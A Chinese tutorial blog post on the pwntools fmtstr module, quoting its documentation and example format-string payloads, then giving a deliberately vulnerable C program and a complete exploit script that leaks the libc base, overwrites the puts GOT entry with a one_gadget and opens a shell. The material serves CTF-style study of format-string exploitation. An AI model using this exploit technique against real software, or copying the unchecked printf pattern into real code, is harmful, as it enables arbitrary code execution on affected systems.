fmtstr模块

最新推荐文章于 2024-02-02 09:53:20 发布
最新推荐文章于 2024-02-02 09:53:20 发布
阅读量949 收藏 2
点赞数 1
分类专栏: fmt 文章标签: pwntools fmtstr payload 格式化字符串漏洞 自动化构造
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45595732/article/details/115112781
版权

格式化字符串漏洞如果要修改某个内存地址的内容常常需要构造比较长的payload,手撸当然也可以,但比较耗时,容易出错,pwntools里的pwnlib.fmtstr模块用起来比较方便,不容易出错,所以记录一下以便以后能够更快的写exp。

pwntools pwnlib.fmtstr模块提供了一些字符串漏洞利用的工具。该模块中定义了一个类FmtStr和一个函数fmtstr_payload。

FmtStr提供了自动化的字符串漏洞利用。

class pwnlib.fmtstr.FmtStr(execute_fmt, offset=None, padlen=0, numbwritten=0)
  • execute_fmt(function):与漏洞进程进行交互的函数;
  • offset(int):控制的第一个格式化程序的偏移量
  • padlen(int):在payload之前添加的pad的大小
  • numbwritten(int):已经写入的字节数

fmtstr_payload用于自动生成格式化字符串payload

pwnlib.fmtstr.fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
  • offset(int):控制的第一个格式化程序的偏移量
  • writes(dic):格式为{addr:value , addr2:value2},用于往addr里写入value的值
  • numbwritten(int):已经由printf函数写入的字节数
  • write_size(str):必须是byte、short或int。(hhn,hn,n)

fmtstr_payload python文档

Help on function fmtstr_payload in module pwnlib.fmtstr:

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte', write_size_max='long', overflows=16, strategy='small', badbytes=frozenset([]), offset_bytes=0)
    fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') -> str
    
    Makes payload with given parameter.
    It can generate payload for 32 or 64 bits architectures.
    The size of the addr is taken from ``context.bits``
    
    The overflows argument is a format-string-length to output-amount tradeoff:
    Larger values for ``overflows`` produce shorter format strings that generate more output at runtime.
    
    Arguments:
        offset(int): the first formatter's offset you control
        writes(dict): dict with addr, value ``{addr: value, addr2: value2}``
        numbwritten(int): number of byte already written by the printf function
        write_size(str): must be ``byte``, ``short`` or ``int``. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
        overflows(int): how many extra overflows (at size sz) to tolerate to reduce the length of the format string
        strategy(str): either 'fast' or 'small' ('small' is default, 'fast' can be used if there are many writes)
    Returns:
        The payload in order to do needed writes
    
    Examples:
        >>> context.clear(arch = 'amd64')
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')
        b'%322419390c%4$llnaaaabaa\x00\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')
        b'%47806c%5$lln%22649c%6$hnaaaabaa\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')
        b'%190c%7$lln%85c%8$hhn%36c%9$hhn%131c%10$hhnaaaab\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        >>> context.clear(arch = 'i386')
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')
        b'%322419390c%5$na\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')
        b'%4919c%7$hn%42887c%8$hna\x02\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')
        b'%19c%12$hhn%36c%13$hhn%131c%14$hhn%4c%15$hhn\x03\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x00000001}, write_size='byte')
        b'%1c%3$na\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: b"\xff\xff\x04\x11\x00\x00\x00\x00"}, write_size='short')
        b'%327679c%7$lln%18c%8$hhn\x00\x00\x00\x00\x03\x00\x00\x00'

这里只展示fmtstr_payload使用方法

演示程序(64位)

#include<stdio.h>
#include <unistd.h>
//gcc -o test test.c -fstack-protector -no-pie -z lazy
int main(){
	char temp[0x100];
	while(1){
		puts("input:");
		read(0,temp,0x100);
		printf(temp);
	}
	return 0;
}

泄露libcbase之后修改puts_got的内容为one_gadget,当然也可以修改printf_got为system,然后temp再输入"/bin/sh\x00"。这里选择前者。

exp

from pwn import*
context.clear(arch = 'amd64')
context.log_level = 'debug'
def pr(a,addr):
	log.success(a+'===>'+hex(addr))
elf = ELF('./test')
p = process('./test')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
one_gadget = [0x4f3d5,0x4f432,0x10a41c]
puts_got = elf.got['puts']

p.sendafter(':','%41$p')
libcbase = int(p.recvuntil('i')[:-1],16) - 231 - libc.sym['__libc_start_main']
one = libcbase + one_gadget[1]
pr('libcbase',libcbase)
pr('one',one)
#----------------------------------------------------------------------------------
payload = fmtstr_payload(6,{puts_got : one},write_size='short').ljust(0x100,'\x00')
print('fmtstr_payload',payload)
#gdb.attach(p,'b *'+str(one))
p.sendafter(':',payload)
p.interactive()

PS!!!

4.3 version pwntools更新了这个模块

如果地址中有’\x00’会遇到printf的截断

更新之后地址加在了后边

Help on function fmtstr_payload in module pwnlib.fmtstr:

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte', write_size_max='long', overflows=16, strategy='small', badbytes=frozenset([]), offset_bytes=0)
    fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') -> str
    
    Makes payload with given parameter.
    It can generate payload for 32 or 64 bits architectures.
    The size of the addr is taken from ``context.bits``
    
    The overflows argument is a format-string-length to output-amount tradeoff:
    Larger values for ``overflows`` produce shorter format strings that generate more output at runtime.
    
    Arguments:
        offset(int): the first formatter's offset you control
        writes(dict): dict with addr, value ``{addr: value, addr2: value2}``
        numbwritten(int): number of byte already written by the printf function
        write_size(str): must be ``byte``, ``short`` or ``int``. Tells if you want to write byte by byte, short by short or int by int (hhn, hn or n)
        overflows(int): how many extra overflows (at size sz) to tolerate to reduce the length of the format string
        strategy(str): either 'fast' or 'small' ('small' is default, 'fast' can be used if there are many writes)
    Returns:
        The payload in order to do needed writes
    
    Examples:
        >>> context.clear(arch = 'amd64')
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')
        b'%322419390c%4$llnaaaabaa\x00\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')
        b'%47806c%5$lln%22649c%6$hnaaaabaa\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')
        b'%190c%7$lln%85c%8$hhn%36c%9$hhn%131c%10$hhnaaaab\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        >>> context.clear(arch = 'i386')
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='int')
        b'%322419390c%5$na\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='short')
        b'%4919c%7$hn%42887c%8$hna\x02\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x1337babe}, write_size='byte')
        b'%19c%12$hhn%36c%13$hhn%131c%14$hhn%4c%15$hhn\x03\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: 0x00000001}, write_size='byte')
        b'%1c%3$na\x00\x00\x00\x00'
        >>> fmtstr_payload(1, {0x0: b"\xff\xff\x04\x11\x00\x00\x00\x00"}, write_size='short')
        b'%327679c%7$lln%18c%8$hhn\x00\x00\x00\x00\x03\x00\x00\x00'
TTYflag
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fmtstr1
m0_49959202的博客
09-18 244
文章目录fmtstr11.程序分析2.exp编写 fmtstr1 1.程序分析 file一下: checksec一下: ida分析一下,发现存在printf(&buf),这里有格式化字符串漏洞,可以进行利用 发现如果x是4的话,就能够获取到shell,但是在数据段内x的值为3: 因此,需要利用格式化字符串利用,将x的值从3修改为4。 使用gdb进行调试,在printf处设置断点。 输入"%d%d", 当进入printf(&buf)时,查看栈内变量,发现"%d%d"是格式化字符串的第1
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6571
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
pwntools中fmtstr的使用
fa1c4的blog
02-01 3850
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
Fmtstr_Loop
钞sir的博客
06-23 9783
前言 很多时候都是因为程序中存在循环,如果程序中不存在循环呢?在一些栈溢出中我们可以使用ROP技术劫持函数返回地址到start,同样我们可以使用格式化字符串漏洞做到这一点… 实例 题目:12届信息安全国赛半决赛西南赛区 思路 虽然我们写代码的时候以main函数作为程序入口,但是编译成程序的时候入口并不是main函数,而是start代码段。事实上,start代码段还会调用__libc_start_m...
SysUtils.FmtStr、SysUtils.Format - 格式化输出
weixin_34095889的博客
03-31 101
FmtStr 是个过程, 它是用第一个参数来返回结果的; Format 是个函数, 返回值就是格式后的结果. 举例: var str: string; begin FmtStr(str, '最大整数是: %d', [MaxInt]); ShowMessage(str); {最大整数是: 2147483647} ...
Python库 | fmtstr-0.0.12.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:fmtstr-0.0.12.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | fmtstr-0.0.10.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:fmtstr-0.0.10.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | fmtstr-0.0.20.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:fmtstr-0.0.20.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
[pwn基础]Pwntools学习.doc
07-10
例如,`adb` 可用于 Android 设备管理,`asm` 提供汇编和反汇编功能,`context` 设置运行环境,`dynelf` 用于远程解析函数,`encoders` 对 shellcode 进行编码,`elf` 处理 ELF 文件,`fmtstr` 用于格式化字符串漏洞...
TableFormat:TableFormat 可以在 Go 中将字符串转换为表格样式
06-28
表格格式介绍TableFormat 是 Go 编程语言中的类型格式化工具,可以将任何类型...{str := ` ID _ Num Digit1 2 3你好4 _ 5 7 8 9 10 11`fmtStr := table . Format ( str )fmt . Print ( fmtStr )} 它在控制台中的输出是
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1137
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串。
CTF-Wiki pwn fmtstr(格式化字符串漏洞)
mumuzi的博客
07-24 905
https://www.yinxiang.com/everhub/note/f07ff198-5072-4014-b110-21fb833affee –原理 –格式化字符串 –程序崩溃 –泄漏内存 –泄漏栈内存 –泄漏任意地址内存:覆盖小数字、覆盖大数字 –例题1:x64格式化字符串漏洞 –例题2:hijack GOT 劫持GOT表 –例题3:hijack retaddr 劫持返回地址 –盲打 笔记若存在逻辑问题或者原则性问题,恳请在评论区指正,谢谢观看笔记的师傅。之后会出一期萌新常见的问题(主要只是为了自
CTF-pwn pwntools用法探索
dzqxwzoe的博客
02-02 1603
相信各位CTF pwners一定对pwntools熟悉得不能再熟悉,做一道题时写下的第一行代码很可能就是。很多pwners对于pwntools的了解可能仅限于远程交互、ELF文件简单分析这些最基础的功能,但pwntools真的只有这些功能吗?你真的会使用pwntools吗?本文从入手,进行pwntools功能的探索。
格式化字符串漏洞入门 fmtstr1,fmtstr2
gftydc的博客
05-20 307
fgets将输入的字符串写入format中,可以输入AAAA,然后看他在哪里出现,由此判断format相对于参数指针的偏移:(这里我是一个一个位置试的,因为只能读取19个字节,一次只能打印三个位置,但这个方法有点笨拙……写入地址的时候要注意,要先从最小的(比如这里是0x42)开始写,因为输出字符个数越来越大,所以只能越写越大,而且要注意是小端存储,输入顺序是反的。这里使用到了%$14p,是指打印偏移为14的地方的内容。问了下同学,他说格式化字符串的payload不要自己写,有现成的函数,就是:……
Pwntools使用介绍
AlexYoung28的博客
10-18 7895
pwntools是一个用python编写的CTF pwn题exploit编写工具,目的是为了帮助 使用者更高效便捷地编写exploit。 目前最新稳定版本为3.12.0(2018年5月 )。文档地址:docs.pwntools.com。 一、环境变量设置 Pwntools的许多设置都是通过全局变量context进行控制的,例如系统、架构、字节序等都可以通过如下的方法更改: &gt;&gt;...
三个白帽 pwnme - k0 [fmtstr] - [Hijack RetAddr]
ACdream
02-27 1059
程序运行起来功能很简单:输入用户名密码、输出用户名密码、退出 运行起来发现:这里可能会有个缓冲区溢出的漏洞,在输入用户名时可以超过20个,超过的部分成了密码 进一步测试发现,该程序存在fmtstr漏洞 在程序4008A6处提供了system("/bin/sh"),所以我们的思路是,劫持某个函数返回地址到这儿即可 先来计算偏移: 在这里下断 Breakpoi...
axb_2019_fmt32(fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’))
weixin_61283545的博客
06-15 176
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) 第一个参数表示格式化字符串的偏移 第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}; 第三个参数表示已经输出的字符个数 第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn
Pwn 学习 fmt_str_level_1_x64 格式化字符串
MrTreebook的博客
09-10 346
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hn写。fmtstr payload函数返回的就是payload。pwntools工具: fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)第二个参数表示需要利用&n写入的数据, 采用字典形式,格式目标地址:准备修改的值}第三个参数表示已经输出的字符个数, 这里没有, 为0, 采用默认值即可;
fmtstr_payload
最新发布
04-15
fmtstr_payload是pwntools库中的一个工具函数,用于简化构造格式化字符串漏洞的payload。它的语法如下: ```python fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') ``` - offset:表示格式化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值